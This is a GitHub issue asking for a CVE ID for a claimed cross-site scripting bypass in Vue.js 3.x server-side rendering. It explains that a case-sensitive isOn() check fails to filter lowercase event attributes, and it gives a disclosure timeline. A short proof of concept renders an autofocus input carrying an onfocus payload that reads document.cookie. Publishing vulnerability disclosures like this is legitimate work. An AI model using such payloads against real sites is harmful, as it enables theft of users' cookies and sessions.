CVE Request: Cross-Site Scripting via isOn() bypass in Vue.js 3.x SSR (GHSA-5w45-w79q-rpqq) #7300
Description
CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a high-severity vulnerability in Vue.js. The vendor has not responded after 10 days. This is a separate vulnerability from the RCE reported in #7299.
Existing Advisory
- GHSA: GHSA-5w45-w79q-rpqq (submitted 2026-03-31, still in triage)
- MITRE: Ticket #2013988 (submitted 2026-03-25) + CVE Form (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, zero response
Vulnerability Summary
| Field | Value |
|---|---|
| Product | Vue.js (vuejs/core) — @vue/shared, @vue/server-renderer |
| Versions | All Vue 3.x through 3.5.30 (latest) |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| CVSS | 7.2 High (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) |
| Type | SSR Cross-Site Scripting — Regression of CVE-2018-6341 |
Root Cause
The isOn() function in packages/shared/src/general.ts:15 uses a case-sensitive check that only filters event attributes starting with on followed by an uppercase letter (e.g., onClick). However, HTML event attributes are case-insensitive, so onclick, ONCLICK, oNcLiCk all bypass the filter and render in SSR HTML output.
// isOn() only matches "on" + uppercase third character
export const isOn = (key) =>
key.charCodeAt(0) === 111 && // 'o'
key.charCodeAt(1) === 110 && // 'n'
(key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // uppercase only!onClick→ filtered ✓onclick→ bypasses filter ✗ (browser still executes)ONCLICK→ bypasses filter ✗
Proof of Concept
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'
const app = createSSRApp({
template: '<input v-bind="$attrs" />',
inheritAttrs: true
})
const html = await renderToString(app, {
attrs: { autofocus: '', onfocus: 'alert(document.cookie)' }
})
// Output: <input autofocus onfocus="alert(document.cookie)">
// Zero-interaction XSS — autofocus triggers onfocus automatically21 out of 21 DOM event handler attributes render in SSR output when using lowercase on* names.
Prior Art
- CVE-2018-6341 (Vue 2.x SSR v-bind XSS): The same class of vulnerability in Vue 2, fixed in v2.5.17. Vue 3's fix is incomplete — it only blocks camelCase event attributes, not lowercase/uppercase variants.
Disclosure Timeline
| Date | Action |
|---|---|
| 2026-03-25 | Reported to security@vuejs.org |
| 2026-03-25 | MITRE ticket #2013988 submitted |
| 2026-03-31 | GitHub PVR GHSA-5w45-w79q-rpqq submitted |
| 2026-04-03 | MITRE CVE Form submitted |
| 2026-04-04 | This GitHub CNA request |
| 2026-06-23 | 90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. This is a distinct vulnerability (XSS, different root cause and CWE) from the RCE reported in #7299. The vendor has been completely unresponsive across all channels.